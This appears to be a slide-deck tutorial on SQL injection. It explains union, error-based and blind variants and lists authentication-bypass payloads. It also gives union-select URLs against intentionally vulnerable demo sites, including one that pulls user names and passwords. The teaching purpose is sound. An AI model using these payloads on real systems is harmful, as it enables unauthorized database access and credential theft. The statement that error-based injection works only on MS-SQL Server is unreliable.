SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution, allowing a hacker to interfere with a database-driven application's interaction with backend databases. There are different types of SQL injections, including union-based, error-based, and blind SQL injections. Authentication can also be bypassed through SQL injection by making logical conditions like 1=1 or ""="" always true. The document provides examples of SQL injection payloads and demo websites to practice SQL injection techniques.

2. What is SQL Injection ?
 SQL injection is a code injection technique, used to
attack data-driven applications, in which nefarious
SQL statements are inserted into an entry field for
execution.
 This vulnerability allows a hacker to submit crafted
input to interfere with the application’s interaction
with back-end databases. A hacker may be able to
obtain arbitrary data from the application, interfere
with its logic, or execute commands on the database
server itself.

3. Type of SQL Injection
Union-Based SQL Injection
 It is the most popular type of SQL injection. This type of attack uses the UNION
statement, which is the integration of two select statements, to obtain data from the
database.
Error-Based SQL Injection
 An error-based SQL injection is the simplest type; but, the only difficulty with this
method is that it runs only with MS-SQL Server. In this attack, we cause an application to
show an error to extract the database. Normally, you ask a question to the database, and it
responds with an error including the data you asked for.
Blind SQL Injection
 The blind SQL injection is the hardest type. In this attack, no error messages are received
from the database; hence, we extract the data by asking questions to the database. The
blind SQL injection is further divided into two kinds:
1. Boolean-based SQL injection
2. Time-based SQL injection

4. Authentication Bypass via SQLi
 The trick is make the logical condition “TRUE”
 SQL Injection Based on 1=1 is Always True
 SQL Injection Based on ""="" is Always True
 SQLi Payloads
 a' or 1=1--
 "a"" or 1=1--"
 or a = a
 a' or 'a' = 'a
 1 or 1=1
 'or'=‘
Demo Website and VMs :
https://demo.testfire.net
http://testphp.vulnweb.com
OWASP Mutillidae II

8. Union Based SQL Injection
 http://testphp.vulnweb.com/listproducts.php?cat=-
1%20union%20select%201,2,3,4,5,6,@@version,8,9,10,database()

9. Enumerating Data :
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,group_concat(uname,pass),8,9,10,11 from users

10. Playing with SQLMAP
 SQLmap is open source tool written to exploit SQL
Injection vulnerabilities.